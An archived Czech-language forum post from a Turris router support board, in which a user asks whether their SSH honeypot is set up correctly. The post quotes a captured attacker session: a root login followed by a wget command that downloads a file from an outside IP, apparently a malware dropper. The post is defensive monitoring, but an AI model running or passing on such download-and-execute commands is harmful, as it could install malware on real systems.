Forum Turris
Fórum Turris Nápověda

Milí majitelé routerů Turris,

toto fórum bylo 9. 12. 2016 zmrazeno a nahrazeno naším novým Turris fórem. Ještě chvíli bude dostupné k prohlížení, ale již zde není možné přispívat. Více informací naleznete v oznámení o uzavření fóra.


Dear Turris routers users,

this forum has been frozen on Dec 9th, 2016 and replaced by our new Turris forum. It will be read-only accessible for some time after. For more information, read the announcement about closing the forum.

Nahoru Téma Majitelé routerů / Technická podpora / Honeypot - dotaz
- Od ZdK Dne 2015-11-09 08:22 Upraveno 2015-11-10 21:05
Zdravím!
Včera jsem byl donucen resetovat Turris do továrního nastavení a poté jsem znovu nastavoval mj. i Honeypot. Chtěl bych se zeptat, jestli je moje nastavení Honeypotu funkční:
Firewall nastaven podle Dokumentace - příchozí WAN na portu 22 se přesměruje na"žádnou" IP v LAN a na port 58732
Při pokusu o připojení na moji veřejnou IP na portu 22 z jiné sítě se dostanu do "nějakého" zařázení, kteríé má název "turris" (viz obr.)


Po pokusu o reboot se můj nerestartuje, ale "odpojím" se od nějakého turrise a připojím se na localhost.

Chtěl bych se zeptat: Je toto normální? Funguje mi Honeypot správně?

Další věc, která je pro mě zajímavá, je ta, že za celou dobu, co jsem měl aktivní Honeypot (dřív před resetem do tov. nast), tak moji veřejnou IP adresu v internetu navštívil pouze jeden japonec (nebo japonka? :wink:). V Datech z mého routeru vidím následující:
Čas                            Země         IP                    Příkazy
4. 11. 2015 07:02  Japonsko   43.229.53.90  2 

Jméno uživatele: root   Heslo:  !@

$ wget http://43.229.53.90/abf/g1xb  Přijato  4. 11. 2015 07:02:37
$ ls -la /var/run/gcc.pid  Přijato  4. 11. 2015 07:02:41
Trvání: [sezení nebylo řádně ukončeno]

Funguje Honeypot správně nebo jsem pro zbytek světa tak nezajímavý, že mě kontaktoval pouze jeden japonec?

ÚPRAVA:
Chyba v interpretaci byla na mojí straně. Po aktualizaci dat z Turrisu na servery CZ NICu se ukázalo, že jsem se chytil do svého vlastního Honeypotu :-)

Takže to vypadá, že o "moji síť" se za poslední dva měsíce zajímal pouze jeden japonec a já :-)

Omlouvám se za v podstatě zbytečný příspěvek, ale třeba to někomu pomůže v orientaci v honeypotu ...
Nahoru Téma Majitelé routerů / Technická podpora / Honeypot - dotaz

Powered by mwForum 2.29.3 © 1999-2013 Markus Wichitill